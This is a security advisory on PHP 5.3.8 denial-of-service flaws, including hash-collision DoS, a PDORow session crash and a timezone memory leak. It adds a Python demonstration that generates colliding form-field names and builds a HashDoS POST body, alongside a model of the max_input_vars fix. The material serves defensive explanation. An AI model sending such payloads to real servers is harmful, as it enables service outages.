Summary
This host is installed with PHP and is prone to multiple remote denial of service vulnerabilities.
Impact
Successful exploitation could allow remote attackers to cause a denial of service (CPU exhaustion or a crash of the PHP process) via a specially crafted form sent in an HTTP POST request.
Impact Level: Application
Solution
Upgrade PHP to 5.3.9 or later.
For updates refer to http://php.net/downloads.php
Insight
The flaws are due to errors in:
- The hash generation function used when parsing form posts into a hash table (the $_POST array). Because the hash function is predictable, an attacker can choose parameter names that all land in the same bucket, so every insertion degrades to a linear scan of that bucket and a single specially crafted form sent in an HTTP POST request causes high CPU consumption (CVE-2011-4885).
- The PDORow implementation when interacting with the session feature; storing a PDORow object in the session can crash the PHP process (CVE-2012-0788).
- The timezone functionality when handling the php_date_parse_tzfile cache, which leaks memory on repeated timezone parsing until the process runs out of memory (CVE-2012-0789).
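The following is an added example, not part of the original advisory and not PHP's own code. It reproduces the mechanics of the hash collision flaw in Python: PHP's array keys are hashed with DJBX33A (h = h*33 + c, starting from 5381), and because the two-byte strings "Ez" and "FY" hash to the same value, any concatenation of n such blocks yields 2^n distinct keys with one identical hash. The block counts the key comparisons a chained hash table performs when all keys collide versus when they do not, and shows the effect of the max_input_vars limit that PHP 5.3.9 introduced as the mitigation. The form parser and the way the limit is applied are deliberately simplified models, not PHP's implementation.

```python
import itertools
import urllib.parse
from typing import Dict, List, Optional

MASK64 = (1 << 64) - 1  # PHP stores the hash in an unsigned long (64-bit here)

def djbx33a(key: str) -> int:
    """DJBX33A as used for PHP array keys: h = 5381; h = h*33 + byte."""
    h = 5381
    for byte in key.encode("ascii"):
        h = ((h << 5) + h + byte) & MASK64
    return h

# 'E'*33 + 'z' == 70*33 + 'Y' == 2399, so these two blocks hash identically,
# and so does every string built from the same number of these blocks.
COLLIDING_BLOCKS = ("Ez", "FY")

def colliding_keys(n_blocks: int) -> List[str]:
    """Return 2**n_blocks distinct keys that all share one DJBX33A hash."""
    return ["".join(p) for p in itertools.product(COLLIDING_BLOCKS, repeat=n_blocks)]

def build_attack_body(n_blocks: int) -> str:
    """Constructed POST body (application/x-www-form-urlencoded) of colliding names."""
    return "&".join(f"{k}=x" for k in colliding_keys(n_blocks))

def count_chain_compares(keys) -> int:
    """Model a chained hash table keyed by djbx33a() and count string comparisons
    made during insertion. With every key in one bucket the k-th insert compares
    against k-1 existing keys, i.e. O(N^2) work for N keys."""
    buckets: Dict[int, List[str]] = {}
    compares = 0
    for key in keys:
        chain = buckets.setdefault(djbx33a(key), [])
        for existing in chain:
            compares += 1
            if existing == key:
                break
        else:
            chain.append(key)
    return compares

def parse_post_body(body: str, max_input_vars: Optional[int] = None) -> Dict[str, str]:
    """Simplified form parser (a model, not PHP's). max_input_vars mimics the
    PHP 5.3.9 ini directive by refusing to accept more variables than the limit,
    which bounds the work an attacker can force per request."""
    params: Dict[str, str] = {}
    for pair in body.split("&"):
        if max_input_vars is not None and len(params) >= max_input_vars:
            break  # PHP emits a warning and ignores the remaining variables
        name, _, value = pair.partition("=")
        params[urllib.parse.unquote_plus(name)] = urllib.parse.unquote_plus(value)
    return params

if __name__ == "__main__":
    attack = colliding_keys(10)                      # 1024 keys, one hash
    benign = [f"k{i}" for i in range(len(attack))]   # 1024 keys, distinct hashes
    print("hashes among attack keys:", len({djbx33a(k) for k in attack}))
    print("compares, colliding keys:", count_chain_compares(attack))
    print("compares, benign keys:   ", count_chain_compares(benign))
    body = build_attack_body(10)
    print("vars parsed without limit:", len(parse_post_body(body)))
    print("vars parsed with max_input_vars=100:", len(parse_post_body(body, 100)))
```

With 2^10 colliding names the table performs 1024*1023/2 comparisons for a body of roughly 23 KB; the cost grows quadratically with the number of names, which is why a request well within normal post_max_size could pin a CPU for minutes. The max_input_vars cap bounds the number of names accepted and therefore the worst-case work, which is the approach PHP 5.3.9 took.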
Affected
PHP Version 5.3.8 and prior.
References
- http://secunia.com/advisories/47404
- http://svn.php.net/viewvc?view=revision&revision=321040
- http://www.exploit-db.com/exploits/18296/
- http://www.exploit-db.com/exploits/18305/
- http://www.kb.cert.org/vuls/id/903934
- http://www.ocert.org/advisories/ocert-2011-003.html
- http://xforce.iss.net/xforce/xfdb/72021
- https://bugs.php.net/bug.php?id=53502
- https://bugs.php.net/bug.php?id=55776
Updated on 2015-03-25
Severity
CVSS Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Classification
CVE: CVE-2011-4885, CVE-2012-0788, CVE-2012-0789